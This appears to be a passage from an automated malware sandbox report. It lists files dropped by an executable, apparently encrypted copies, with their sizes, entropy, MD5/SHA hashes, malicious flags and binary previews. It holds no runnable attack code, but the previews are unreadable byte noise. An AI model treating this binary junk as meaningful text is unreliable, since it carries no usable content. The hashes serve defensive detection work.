          Preview:..-....*.e.7.C..@....j.4..Q.O....x...P...Wv.c..i.5.....SdS.m.j]rI..9...#D.M..r@.g.i..M....T..0.9..p..2p.`.[.w.+..w.G..3......;z...s[9.H.....{...66.....P.U.;UP.>.[aE.d...$.sN....Gs@....\q..aL.O}....fM.....?.r.H........Um..D..7.......JMU.)...1^..3....gd..hw..o.....3G;..r=8..5S.C=G.PC....\...r.N...vs.....G...!..i3-.wk........P)w.h.J.Mf..~<....@Q.X...f..m.C....j.).@yM\f.)\c.k.......X..=..C2.._SH..O?...'..C...r...L.~.r..j[j8......P..? .B...bY.IT.C..-.........(S'...e.u..(l..{)o..5..b?;.. ...^..l....F0G....*.\c.rm.TW....?.qp.mP.%8...(..m.J.E....?r.D.Z.Q....Z Ys....9y+../..;x..L3...e.../.X.mC&.+...W...zG.Q..`9...1.q..W... .....|....}.r.........=b......(..'D\.0A...Zx...,.K....k.A...Q..qf..8....y..v#]...;.(v..... .XO.Zx.b...-(x..I>9.K.~.q...ZB.s.aM'-..sAN..7...?lZ..)^,....i...."..=..z.'.....'. s.o/K..s.=.m..v.....C..m..9../6_W9x........^z-...{.@.L...&.."T.V...*6A2gZ........b...a%(.*...3%.s..6..I..:.%....c...M.....C..Z..sl'...g/.n...IX.m..m.0.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):49486
          Entropy (8bit):7.99673745384596
          Encrypted:true
          SSDEEP:768:msAE4JTVj/0sUzfuK8a0d8V04sYzribkS1cNCCqYP72TMkimVlVwwKays5Cw+kxP:AE4NWr8agI5rsR1c0TlVwDaXkfkUA
          MD5:D28F9173CC02B02786F6649621E721B7
          SHA1:8621CA40CF15F89D7BAD6FFC0E0758C8A39FE947
          SHA-256:B9C649210394B131EA6CCA17AEE5C37ABD6B757CB2CC9C75E3A171A980715843
          SHA-512:B37323C26EB7C21800CAA7A5E2C0CAA7941AC03E1A776D9B0EF93A9281E260141F1126F24FFFC98AE61E5F369EE7256BF4DB0B8FD85AACEF85C8B8DDE0E5CA1D
          Malicious:true
          Preview:SQLit...4..X..b..p.".....-C%...."A[...b.(.d.c.H...+).F9.z.|.0.....'..\)..._...{......_.!......Y./...f...E...$...m...xi.E..THHA..*V'..ac..3.e.+...A..675(...wB...k.bG?.P.a\.....1@..1.....A..k...G...Hh.[.L..d.5....L.p..*$..}.'7...U:.:..j.`P......?HX........3V.y.~...........87..\._..p.....el...w..*...,....`.f.>dpR...*wyv..-D:..l_...G..m..2..}.w}...;........_.aC......./H.....{.....P.Y.uUc.F....h..>.{z...Xe..O..._+.?.....P..M..J....|.s.-.Elc.PM...7.1.%...(.....g....f.;..'.[....X.......n..S.e.....2'.;h.%2....P..BS...i.....>...m..?..*.. ...K.X]..|F.$....9..7...D2.r..|:/..C......g.P..-..c...%...W..-..).k..y.. f..|...9.G...L.R...O[..H..U...............1+..jk.Lx..w..@r.8o.......&.?...s .h.2.......$...!H...J2Y/.:.=*D5.......N$1b....fz6.m..L......D..:.\.P......v+.,.y..A/.'].g..Dm.A.G. .4..h.u.t...*....W.\..._5..!.......p%.. ...=....%v..4.sU..n.7..#.2H..a.g...d.x..n.S..l..(uH.P).0..{f).h.1-Md.....j.=.<F...M./..W....i...s.%J].O....d.....".zg..'z.k(..Y
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):33102
          Entropy (8bit):7.994020428253238
          Encrypted:true
          SSDEEP:768:Vv6C1qDJsQQ76VE/O0uE9mDAzEXURGWd87TUj+1/ErHXLbitAJaN5PmfyU:VixDJsPer0uE9QbXUBy7TivLbiBJU
          MD5:BE593629C0CAD1931E80A7F9A6E50F89
          SHA1:08343E2B5F0BE1072EF0B3587B6D121B0E16BCD4
          SHA-256:DD17C5CAFD989185FFAE61274767965FCCF669DEE92B03F0974237622002F036
          SHA-512:0B4D097F198BB48341EE58DBAAEA5E60E99A9111849B461BB912870A8619B49AF3841F63C3943539DF0C73B87C653000E3F5F1D7D45CA5AF19DC15F54216DBB9
          Malicious:true
          Preview:..-...O!...A=h.A.9@..\.r..<.(..:.v..-.~.....f......?.sp;..'....._...c%.[q.._....:O..:X.=_f....}R:...8...lq....uY`N.l..j.......d.y.$k |....rAB.>.#.7..#..KI.q..0..h%`...g8h.A.M...C..y1..&.*xk..7.M..I.:....P/7.P..S^.d..5...4.o..J6..T7Z|...H.Ol.BHbhp..._..hS..ig..i....#K:....VA'......U....%s......LL...a..8.N.L.,.S..g?x..D....U..M.!.;ZgY..Xg6......s.RY...h......?..>S.........s.2g.dW........%.....8^..,.EA.Z..lx.4~E.....c.|.R.<..~I...o....I...Z.....V....(.?...F'.....D.UQx;[....k~t.l.....U.....;1.^:,....).Eb.v.c.a.V6...nWjq.W.. ..5.-S..N....Ix8....<..)9.....(}.C..-7...h....0]......c...-X....n.eTb;\.dQ6.g.._+...4...qD.5.i8...g..B.+.z....e..v....a.0.......&..z.v... .....v.....Um4...`%p....!.....V:N+H.... G...V.x;...u.*...[2.)..t....&..].....l....6<)....U.yA$.......C*.]..g:{=.....tm........7&&..8..WU.TU..q,.8.....X.w.^.I.}5#..K....{...t..R3.s.....,x.@{:.1..-( ..G.2.!\......4..E.....r/.......F.....!G............b.I.|.a...}....:2....*.URF.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):49486
          Entropy (8bit):7.996799681734035
          Encrypted:true
          SSDEEP:1536:RSd1Yg5jeeDcBd1OmTeE5zvKRfz9rSJfnGCBL81H:C5iegB7OUNyL9OJeCBcH
          MD5:82575A762AEEB7359354454D8A8B0CFB
          SHA1:1CEC47DE9F14278DCFBBBB67EDB530303AEB64BD
          SHA-256:6F6028340DB4BAF740A1B8482742BBE3AC067CB57992673EA62818A27936729B
          SHA-512:61435025A7E5D8565E30870327B3AE4AE8457C1F16DE04CE9D7B8991AEDA046FA3246381F5DA66E33E91F2D966E421145C4685E4B93DEDA27007598EB2E6044B
          Malicious:true
          Preview:SQLit.h{)x..g@...t...Jgk....hS$.....V{N......4A.m.B.$...P..@..^Z...GX..qSA.g\....J.ND0.4..F.;....N/2.........+T.0.|...C.mw.`X1..M..{R'kK.2.A.....H..`...f...k.......t..A....Ly.|k.!.=...=v\.+...."..u.3.......O/C0!..B...#.6.............^'.]..w..0p..M....=.S..9....a.W....}..`...{..6.<-.....+......I...5.....%=.U6..#@.Tp#b....h..M..".....e`Y../P5...(...m...j;q.c.../.k.2. <..:w.d.U~N..B.x.c.<...Y.P .....ThxD..k7....9...!.*......(=X.....1.Q..,Z.Kp.m.....[.cO....,....c.....0.._'...O...8;..W.z.t.E........i............./.8...b....WvB[......._5#.i^3...."...?.e..k%S..S.u.U.N....-a.r...\.mi..i7a.z}b.".o...5,FgQ...4.;.....C.&W...@....l@..:Lc.DS.B...e{<.E.3...A........JW.._......3.-.<C......J..d.-..#...........g....nu{w.Kz.**G.q..!...d...T..so.....>l].Z.|..XxCJ......T.o......i4.aO<.:.=....$L.t.T.d...4.vs.0F..vq.\.y#0............|.Y9ZW.Eq.......Z.D...!.*A..qK....C.....U.GZ..<.*P.h.L.|..Nf1.T...*..%R....(N.Y.c....f..T..|..BU...8.F.]....1..~4...1K..g.1f..o.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):33102
          Entropy (8bit):7.993946168117294
          Encrypted:true
          SSDEEP:768:3sfo6hm9GWcZByb9NBJ+QtxOvxgh6soEMJxCZdW1mQQKZHjooirrA/:3sJm9Gbo9NBJ+6O5gh6s9IjpjoLA/
          MD5:F40ABFAABC4AFF411ED9AB41F6E63328
          SHA1:4096E043E3CBCC3F18B43B1651A25BFB833E6031
          SHA-256:488818334B84065E79EA9877417A9CDE6964B3AF1540AE8D2886C667DD6BCB0B
          SHA-512:CA581CFA998E807220CFEF1622CEC7B594544A6866A13A027933D4A0F59D8246BFDCF5F884DF5ACE7E8F19246F926EC53CE05E57E43674DBBE78BD49FCEAC2F0
          Malicious:true
          Preview:..-..E=......9Y..ZleZ..Rn....@.....j...L.o.An.5,..<..U.....-.........E.I..a.R.$..)......{qV|..j..t...3..i...P........J@.).#Mo4~."...[0...4..+....Cg.z...+.#<..X.n...Sn"v..pz..s..y....C..~j.....Q..~n?.X....2k.W~..E|....$$(....Q...t}.......A4O.._.......Rx'8.+..........@5c.A..)..V.t..0...U..@....q..8..{.... S....M.....!.b9*.,*].../..Xs7]....r.7....l....vie.c....p...'o]>T.......E$"..)..z...5D.+'...a.x...y<:%.....A.o)..,\...p..>).y....d.....s..5.}\T.8.h.m1...M.'0...I.z.....Ds...J.~....@.=.G*..,o...$!..3....Bz....0.b&.#.T(..A....N...c..{W......u..).i...W....0..3..l.^..........4...>y.)<...z..?T.=4..6....b...n._..Z.......a....eB?...1..D.z.8..d.Je.....|.b...Y..W.Fz....%/...S....j.Z.gQ.k..!.KGC....o.. K.D....!M.b......N...,....4... ..&.P_..%10x.Ty,..Qe.$5.d..L..FY.v......MX.....c..]=..6..r.g....-.....m...q...&.....l.?...'...%.m..i?....M.!...y.v..2y....,W.o.;p-.....S..|.......YI,o...A=|..........;}?..5...d..{..hC[R!./.cK.8.-.tG...:y....D..;a-..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):49486
          Entropy (8bit):7.996888503639856
          Encrypted:true
          SSDEEP:1536:G6ZL99Ydn/ujryp1/OoPXkl6CYHjIrtsEBvRXj:GCjYdn/ymp1jPUpujImEBvRXj
          MD5:90EBD1CDF46242CBAA57D50826EFC1DA
          SHA1:6B8AC1E77F3A66B331818A00098D56965A4DFE6F
          SHA-256:88128CD7455554C9226E1FC723946CADF2BBB9691862030855A2FBE0EF663E37
          SHA-512:0E72D0784D5E84960B635F222C53D134A0A3029722155C2700FA12B23A0D19F248F2151D20DF20D0FEF98EA4E3C87B41265EE17C5D224ABD94AA8B66498C8DF5
          Malicious:true
          Preview:SQLit..w..f^..+.;.8...:.T.c@....Ws.. ..Od-...]<.Go5...,)q.|k)pk...NE.^.K..`A. 4,..\.B....p..,j.Z...i;z...w9..Ms..r...i$.,.q. [..K...h.....4....z+..<..f$$C2.?.Y.....{,)j....v..E......w..&d.L.d../.yYa.AD..F8.N+..G"1..i@....&S*G.7..N(...P;i?..........b......H.....g..g..p...l_B.`.....d#...F..GWZ...@......;....Xe.:@-..q179./A..1Bq.j.D)D...%...... $.m..//...3.k.dt..X....L.g'fV..........(.I.....W.~Sf..HH....Gf..!B:..9.De..T!Z..4.4j.)r..z&.........,...i_..Y.\]Y..M.\}d.p.....,.U...X.V._.c...9.4..eD......vu'..)............p.x......";..7.............C.q./eLz.9.Y@3....i).l..N.y.h....ZO..'.(.P2...1F..pGX.....`..5..]Q..fp.%Q...4`....q.G.3....[...|....L...Nn.....G...oLvXE...0...K.As.9.bHq+.h..X^.`t.+Q....P22Ee..\....g..*....d.....?..D;UW?~E..[F...............!)a>.x..|R.....5J2X...b...k|...b..4..[..F....mW3Ox..D.Xg..!...;..;i..M.i.=.....n.U.E...A....4).NS%3......hhI-..M..F.l..r].Zj...e...IH.r...N..u.:...hu........U..P...) ...E..(.J...a.v.6.P......3...Z....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):33102
          Entropy (8bit):7.99450815670075
          Encrypted:true
          SSDEEP:768:gsxupYJgj42ZFusBDlQbveG2JhKQ8SAQDwUcj3iMNhufTu3+d:gnO3oLBDT9Anx2v
          MD5:5D152B5CC311726DDE415C8511C9C2DB
          SHA1:50ECA6F70ACDADD5CE13DB56728EEA415AFB4439
          SHA-256:92775BCDF0031FF8029CBB33442C9D47A95086852532CA40B57F6621DB2FB626
          SHA-512:3178AB326D6FF585A936BC13C8AB873C1E4401A58823D6609C0807EBFC54098397898A9C6B7A89AD28C9D22F1F599B2ECEF4B5210EA68E8F7309024DA5D32894
          Malicious:true
          Preview:..-....j0...T....+.).....ciqA.^$..$....Y%.B.g@.a..Jv..MbV...D.O....j.1......... O..e.l..._..K@.....5.x.vL......B..Y..a..%t..<.w.A....,...O0#$7f.5S9..o...w......zk...Q|....M.?...z....0d.E..C..0...+.=.-O....m.>7D.8.f.j...k.9.4....^.)..F.HhR.+......3..~...y...hK.].EN|..y6..+.t.../.2..!fpw...`..q......G...US..h...6.e../.sJUB..$i(....h0MMu.......E..8..........."....5uV.O.0...... .k9{;../..}.'3..CE......nS.."..PZ.(....R.U8<....N...S.:.Y)q..'.)...\........'.o.k..p.g`..x.6)..6..O.....q...N...'..}......UP.-."d..I..5@...-6[:y#C.#.9*.(....I.}....s.gz.rt.Cc.O,^..H0.I....&...d....lq%6....ks^t.*..aH.By.jKn.b...&.c...'.,.Y..~p..hy*.1.V....c(l..?...g.Uu5....7M+.S...Iv.m.-.....V.../.R.X.............][h...#.ZI}.m...$..1.[./*D.9..E..&..}cYs...K..Q..}*Ae.j.vP.....H...gf.-u-..v..h.l.....o.K....q.,8L.;.....,.F"..rq....F]:....zMT.T..np.>..[.'*0m../..*...7...)5....._..g#*.D%.ii..g...A8../.n/....0....L.w...ZsS#...?q...d..*..?.e.....5...7D1~v]....'.B..Tvqg.X..Y.J..L...!_
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):49486
          Entropy (8bit):7.995885696464419
          Encrypted:true
          SSDEEP:1536:ySwXmWPf7zaftmlyI0HoCNvYNoNd135OMehm:ySgmWPf7GfRbRNZh35Jd
          MD5:FE9E406AE0FAB56DE28F59F274EC4B9E
          SHA1:DD35AA0B6957B4700A831D2FFECC814BD61660D5
          SHA-256:77C3EA85A20D45E1DEE5EFBF3CCB48E6AC55005A50E6B9D32507DC758C07982B
          SHA-512:65C5E5105FD38B3185DCD1F7B1A764041E19AF718A5D836794FFA33A219927807977C74F562AFBDD1B785A41E8603C128F0D4D3363EE6F920113DC7636E86A9E
          Malicious:true
          Preview:SQLit...T.....2.2.f..j...H.m.rJ.Ag..2v.....~..G...B.a...9.y\y..Ksf&..K6B1.....pNp.......l2....,....o..e..<....L[:Tk...K..h..b......Z......K~..S;-p..M.......;.n(]..Wn{..O..?4...>..C.Q .....=....tT..u./......~e...)..|."m..h..Y.keUr../.-...E...L.P.......Z5U..G7..W.L..dB[s...IU..>...e3C".?d..B....f:.tC...;.1[.GF..+.....z.sG....m.q.:..}..n8.K.9..Y>.....W....#.NU..5........w.W.../.n..f.r7...S+'.&.......j.^..T~.<..Da,.....Z......m`R..ALPG!.:.J.4.VaR..3$25.f8......w..w...".r...u/....PU..,.]N.@......8.,..p.ka........eA.j...{......W....a..6... k=lH.C.B:@8..J..P..(S..i....w..x....[^...Nl..5:kg.r.....*3.[\....V..^.........u.......B..Hc...s(...h.. ..L.....Gn.RE.......Q....|.L...8.....bC7.....6.v..#...[......Ik.6js.7N.............[..#...p.....3.=..=.D<.= .y.|t...]06..jV..$<t.yG...'..|..p<e..^8...a,..~.bj.*..Z*..\.M-i`...i.......BR.-.(....0#...BU...>-z..4..[..k*(...d....DZ.-.z.....a....L........aa*;B..Xi.{.L!&....vA. .B..O\8\.y..."....cnkO
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):33102
          Entropy (8bit):7.994687834769182
          Encrypted:true
          SSDEEP:768:Qlw6s3EHXFmLW+ie+Kqb59jZMu8IiHjBhkJ3zWt5H:Qlds3E3ILKKqb5FZMCcjfkJj85H
          MD5:742E2EDAC282C2205A3C2B62834F3B5E
          SHA1:CE01B5217B8C9C976B7B7BE88340B5C5657BFDE5
          SHA-256:62E4F745DBC63386E5944418F94E76211A6FD47D6EB7FEA7509096E8AAEEB52D
          SHA-512:488FCAC0A0AE4E155C2F21FC32914747BEE649A106D2E591A489C1C9B5B650E281B3C426F91526DA51868DC72F2FEB91F3FC6F5F65F5055CD049FAF67B672930
          Malicious:true
          Preview:..-..gY.d5.I.{%....Q...6....k.,.V.....aQ)d.Uio.t.._f...%*Z..&.5..v........f.#'OM........[.j.c.=.k.~..........=c.m.........2....{...h.B,j2.T...5..l...E....=Z3.Ftm..v...s.....8.7...x.o..3....Qr.@.......o..R......}.v.8.........2..:N......F.......r.......#.nzu.p...1JU......v.eu.&....M..V..mU..>..Q.......37`1.H......d.,M..J.f..p....*.5~....e.(...-.D.4m.....dI..*W>.eY.....mI.?..Ym...H...PKQ]..{......D#....C-m...g..qk..O.t...+.\.-z0VI49......<g(4.;...~?...K.8.......0.W.i.3. .G....eG.=..H\^?.K....q..^..#...|...t.xFz..&`3..-...!X...y..C.h....#.Y<2..........pq....;@......QHw.C.....y.._6.."q.i..*.[kp..nyvM.dOQ.9..c.Ty......T..A.. .{.p.8.P.z$_O..|&......Y.f.FC....S.|.3.%.j.[.i..td.....n.a.d..^...~.";..G...+...8Q[.M..{.I....8x}.O.h....w'..=..l..x.....x...A..Bc.....K..t..k.).^r.&:.....WS..or.\v.E..DA.:.....EC-...p.B.W..[.L!7.E....U."7.c.%..]...S.(}z...I...+ql ...i.........Z.``NI+.E.Gt..3..<...&.A....|N.K...)?..o.k......v..$...g.0..)...y..7...80...d.2"
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):541006
          Entropy (8bit):5.62203587125042
          Encrypted:false
          SSDEEP:6144:mdgvzK7TAny8GFfu9sA167kW51/iEwqsX2YkGE/f2RaD09Cw/o7mC:pvzKQnzGIyAYkYiEwqsG2HRaD0xgmC
          MD5:25C7901A9DA1DEAA3B762DD476BA5C92
          SHA1:D46D03A4BF35FEAD5D6C339F079B1DC351BC78C3
          SHA-256:711135B81E2B5A1E504A5DF13C9FE9AAD434270A8CDF2951DC1E9B679BA8ABA6
          SHA-512:2F51CCC01D7AB81E3B5903252881AF2DB6DC2475195179090C458E20AF912A34E12C1C606F7C2FD2B7781766057DEC03D24C92BDA4FB85C48D8E5027286DCD5A
          Malicious:true
          Preview:SQLit.. .9.9..B06...BZ.sg.F*...r....|5.k..F.1w.\6..W.......b/.. .Q#......k.....#.U9.nvZ...R.m.V.K..48....DF...........0.;[.&Q0.q....Q......NA.I.'fK..X..>....@.3....`...E....9I&.|.L.l...YZ..z.@...B.%-b..i.6...2.426..yR....._.S.#._K.I..l........>.....x...<....EG.....LH..F#.BzWd.N<..N.6........#...A.m29..<......?.:@.ln.. .. t.T.F.n.Q...}>+.D.j.......K..3...l...&I(.@.8.b.w......+.g...Z....`~........Ay\...u=,..}........;p.k.MHK..6.AP'6.d./.T...k.?&?o..;.d.........L.H.{.o.b...X.P .fY$l.*......:.Y...I ..1...W8..E..b..9....$.KQ.+....q.7.=.^...l...^...<..w(.s...J......\.a..y..C;sX778...eI..@...9. ..zu.H#+.._.A..c..u..!..e.pOd.^..9d9.^.L......<.H,.h..U..+..wy.+.. ....1`..X....% S}.r.q.YCd.&4....(....OJ.L)?.o....|N...zagu..4....'..Y.e_v...~0...;y..2..fN"n@.X..#..............|.........&.?..a....d..........z..Z.......Lq..1....)A....TMk.x...;70hZ...S.x9........}...i...->.}.\.N.....'...s..f..oW.6k.........L .Ji...9.#R........K.`....T.J..lR+.<.|(6
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):33102
          Entropy (8bit):7.9947542529267235
          Encrypted:true
          SSDEEP:768:NqALBae7HsPkZtM0j0qirtQKojfaC6SD14R6r5zVaWMZ+/lA3aN2hjJMG4t:/BlHz0tqiBQDXD1nz/MN3y2hjJd4t
          MD5:EA3620CD4E5FAA3E41D57D8E9AD78A56
          SHA1:7EEBE4E6EF49D97A2DE4C86D4EB58153A282B1F1
          SHA-256:FE0B81B675B373FCB1B13B7C4C58C6C8871503D7347E55A3FA774DE7DA0736BC
          SHA-512:B931919B82E0FCACEF5A16894466CE2EE47B69763E7FB7116AB75C5AC13B92F089F8FB02FA9304852B6286D6BB933868B2024EF1CACCD419249392C0B121B0E6
          Malicious:true
          Preview:..-..%*=;.$Y9hu.....`..}..]....}!:.`...K ...}A..'$..#.W.5.......E.....v/.M.......6.@@../....5....c...Q....d^*.O,...t......o5...j.W. ..Kv...7<...i........XL]..3J...b.Sf.IHH.cOc.%.......".{H.n ..........6.....u6..M....u.%...Q.......y/.Io.'/Hi.c<?^.3.r..'......ZcgpP.$.3C..A:.F].~H&c.-]%..[X}.^\.l..Y..0..r..S.e..a.....x. ..d.C.[...3v....f.<.....H.2]..C=....c...K.^....@c9......a..........X.C..X.'....|..V...|...i..hD.0....]a: 3.V.u..:I...q...J.....H\~&"..S.....K:..C).5.....2...LYzn.h..'94.>[.`s..a...~.FQ....x%.x.4.j...&..OT.w.5..w....T..f.g.....4. ~.d.....0.nPK....M....)....*.E,<........a.Q..^Y..^.?...@..^j|..n].....+.a........o...Y..g....p. ....Y.:.~)a...$.(3...z.[qI.6....f..../gY..1.....O.>E...x..3.~H.'..p ?.7...A.$..I.,..5.e..Tx\...+...:G....../.M..l.f+p.I.q...L.C.R*.-t. .7........$...Q.-P.....4......@.6.^.....L.......<u]6.z.x.s.B.....UOlD...x.D|....c..2..z2.....Y.c.W.a....l3&.@.y.. ..O...."5iQ5".....q.M......U!....E...9....v.&..b...<-.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1360
          Entropy (8bit):7.842741105416053
          Encrypted:false
          SSDEEP:24:gwP6aBEiivwVII9E7KpKdeVNr7JM+H2Rc05IDhTAQ+AFBn42kEsbXDJzGiTkbD:gwP6IEiiUi26eV//HYciIDhZ+AP4VECg
          MD5:05C3E003BE2A1EAF5427547BE81D1586
          SHA1:B1220BFB60F8104050442B946DA9065D11533070
          SHA-256:3A93E45417B3344CD2592D6C8A38038EAB96A0F9F9C2943336AD76BE0415CE5E
          SHA-512:2FBCFE154F26B4D2D071E65AA25013E4F8945D059EAA092BC507BA437F79A4D8EFDCDA12D7B4F943DC07E39A5F0FC1BEC3A863E324A17BBEF7D8347859424F01
          Malicious:false
          Preview:PWCCA..DP=.n....s` ....KmZ...8....4CN.$.....Emc...... Zql.. ..4..F.n..5.O.E...y.i...y.:./U..O.nQ.....i...!.X...}U.0..=.o..'....|.......LlW..NzH....).Xo...ny..>KK.\......Z....7.d.Bb..%.9R.h..N..=......q:.~.4..vy..2......B....r....Y.L)U.....UL.{.Z.E'.&.z......w.R8..F`Id...Y...!....K..p....1.0.Bi...F..%...S..d.x..s...9....JU....E.$!.Z.Sb.B.5..M.-.....X1....*./vh$.h.y_U....V.....{.#PF..~.......M.A....*."n.W..b80.]...MD..A....E7&B.t4.J...h)..,zH..\..;Pl.....=..3...F..%...J$..:..g../-aE:........c....s.p..`%.X.."..1...".....x...d..4...V...z.R.11-..8$....f6z{....L/...Z*.G...E.8Z.F..8.-.9.e..y>.~.....\.^..........,.:...6._....s:...*..g,.....g.{.,..).h.x5...........k..)L@%v..\s.n%.\.P.Io\.......}..$....Qi.44...-....`.4......@.u..4..^J..........(/9O..73@ ....u.v{J.+.......n?'..w.1.....ps..Q.-.7s..e.`..?.(7V.....6.".N.s.....l.....&.....y..yYhI...f`..ul...e9........Kf....'8.....pt=^['lk ...|]P}...R.....x..~.....Cu]......w...;.y
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1360
          Entropy (8bit):7.827819614041736
          Encrypted:false
          SSDEEP:24:ZGmlLrDnmBHyEilT9ylh3kKpWzvtJfs/+gsQMam+b+7eHHZnfhEbiTkbD:ZD7mJLiTEz3ksWz1Vsm9wmvCH9yOiD
          MD5:72A3E6E1A6C3CAA847675E4F916A5DC9
          SHA1:8F9C6E6898FED7D18BAF661E5200AF94188E08C9
          SHA-256:CF99B163F1B429696EEAC380E2D68A9AE25DBFDA1094E6FBCA46866827C634EE
          SHA-512:BA0E0B3833FE7A702012CFC8D14B0A79F76C0652B8921B55495F07D566CF9DAD68CF2D2C2E748D442B2434A47662A0A71113A7A4E4C5DFE5B4793640020A24B0
          Malicious:false
          Preview:PWCCA....T....c.+.......8PbA....g.Qs..Fa.l..;...P.|.rF%.......7..$R...s.TJ..uL..i..."...o.^..}%.....34-.sd..F87`.p0...Q..%.p+.......SB.2D....W..(..p.<.....{.)Q.}.L..,.t.q..Qi?..y......9.\..p.Jh.......md.Cd.m.?....m..cZ8..._.....?||...0C.......,.,..cV...d..^..(]?.+...;..#.p OS.B=.....x.o..Df.....o/....l!.R.!...Mh.S.0....k/..c[..$.e.+...B...H....L......G....S..[...L.P.O.A.oQ'E.E...L..[=...[+....P.r.....d..S...F.n...UyS]....0..b.Q..uQQ.E..7N5....#..[2.f..u.......(s..!......@..(.o.@.#p]#X..b..U...M0..7.OG.R..P..)Ca....h..5...[\-.LPJ.Z..."F?...I3.V.`....;B.....s.Q....>Gur.Y..O(V...J.j.....lw.[..!..2.~e...48.V.......VJhes..C..{...O2....N;.-..#..qr.0...........%.E1B=.S4....IR..w.....~. ..]...<.|..LA.dG.)...(W_..F..w.......Au1_l.......%2"....wj..]....*.....(wwH...#.Q...L..g.m.......e.|l....k..3$du.F..P3bOX.O*.\ln3'+f....Q..QI.........S.Dc....if.~.A.........5.n..#]....> tY..2m@%. .;.;~q.>.9).2....1.."dpl..y.......?.t>....^Q+...(O.p.........."^/.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1360
          Entropy (8bit):7.864847976424019
          Encrypted:false
          SSDEEP:24:2qfRBZBdrl9MbXi4v2tkbZAiJsMpg/0zBhuJW+WY9pCOGAkG3Fp6Tw5eiTkbD:2k1dXM+4v2k1J96M1huQuKjG3koiD
          MD5:74664416A5B84B8E780B0E5CA705EEF3
          SHA1:6EE512ED9A2D53E6E860BB4D27ED638FF662A185
          SHA-256:D6648B8AB6527095EFFC83896A68AB4BE50ED63EEA5597124105258C692AD014
          SHA-512:49BDC65E8CF7FC202D838A2930B6A1C51B5F4632ADE235FD7DD262684DAFFBB4824CD71F88D1FFB80C895D1D770FBA9138E837712B01069E7647AAEE8DA534BC
          Malicious:false
          Preview:QCFWYO..wy.5QUp1.....rZB.wL\..-....N-.w#......y....R.....z........Ye+... ?.%....~..^..Nm7R..v..g.z....Y<a.....k.y(......`|(.:..K#..H)wp..Z$n.J..yF.z.2.!.%..5.Dn..&.g.3v..Xw.:.:....'...f.....2:.......u_..8ls...8...a..(..w.R..2Kt.^.....N.O.2....G3._8..RBsR.qn...)T.H."..L0..mu...qD.;.MN.7.T....... ....<.-lWOT..8..S.....$.c|.......~r.8._.9l.e.E.p.T.yV.B..7V.AL.H..,...0..>....]...H......S..N.j.].hs7.L...W....(....TR....9..}x..../.X'.1.$.$...".....u.9..).....>..}.......M.5....\g.23.."..r....{...&.C.m..n...........s...0g....F.b...i.p 3M.I.u..y.....x.]...c.p...]...W.h.#......O......G..gv.,l...a.d.....*=...[:.....{5.X...r...Y.=p.....m.:...B.....15....~.5.....'.\.#..-.[._.....y8>...p..A!^..&_.o.F.Q.N....,.y....FT9...Ul...P..@Q...y.......Xx.U...<..S...'...x..`X,......&.RP....+.....yiJ3\.,......G.9..y.6.T\Yx.1zQ.....}..*......3V...+.."..A#l.._.u......v.#s.kaK..M........,w.F>...!.9+.Q..^.eD...-..G".Y.;4...c?..K...A..U..fD.R.V.Og.... ..fI..6%..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1360
          Entropy (8bit):7.849897986836474
          Encrypted:false
          SSDEEP:24:V9+wu7UsosFnHHzjWH/r0B4yqRpRJBgEVKNTSqiNNxaWFIbIcGpIiR0a545oZiTW:H/eUsosFnHHzzBkvBgEVKNufqbIcGpIk
          MD5:7AC9D859041E48B33E4A775AC86625A0
          SHA1:4B42F34F4BBCC74CC75C3A3C9BE6B8D0FDD54411
          SHA-256:DD44330E349C0922F122351380598C764F72F9853DECE289A3F5DEB831AA130D
          SHA-512:8438043CF13FB4311A6137D2CB6F029121CF822E217F94EF3D1CF4081171E60DF69ED8BA2F3CA599A93C511199170C291F75DB60A1CC626CB0D042A5DE92F27E
          Malicious:false
          Preview:QDJMY..V.*E%.....sH".Wd....!D.F....i.-.Fc.@.^q.sb"..V.....dm.Q..?..H8...@.....$MS4=)@+/%~.....]@M...w..?...<.:Q.)G......"2YQr..gj..q..d.g.uU.aSp.'.uU.[n:..1K.dP...R...=.^`( .W..V.A. E.<-.n.k..c..d..0e...w=.....B...-."........j.....(.R,.o..=5 .)q-.6.(...v..*..C.6.xBN..s....p./...........t....,u..5|......x.....,{.x..m.../f...$U..j.bIj.v.Mv.`.S...3.4T.............D..;......4.A1.R..NJ.h.........t9.D.Lh...w(<..O..}H..vl>q8"...?.'.....d ..>.i?).:.AL....t.q.......f...F...-''?.vP+....].o.b..6.v.&b..Y..(.??.........7....4....[..Or.V>m.......C.A......'.a.Y.).4... ....`..V...9~.$.\.QJ|_..q..sbu+1.~Q...6(.U.G<..;_..a=.o.^.`..../.@.L..q...g..f.@.........p......U1Z.r...&..rf.C..V+Q[.O<...j&.,~F_..(I..u?lS..c....C5 ....9..2Y...{g.}zM....(.9.cDJ...DLf4c...&.cIb/Y...`.O.PhN_...^....+,...c.w..I0.Q..;f..}.......X......u..<T.......DA3. ....J.......].....!n;|4..p..]s.\.E$Emb...g?..UU.1..A9..J.Y...L.a..}..o>.-.....(O..~...q..T....v..x.k.).s"..E.l..,....c.....I
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1360
          Entropy (8bit):7.860712146841866
          Encrypted:false
          SSDEEP:24:5C0cHDQ8CjrwFsNHvzXGIvkz+WCF4ISlkQRXuqaPXi1Qqzh6knDv69E+iTkbD:5D4CjrZPzXKz+W3ISxuqaq1Qq86Dv4iq
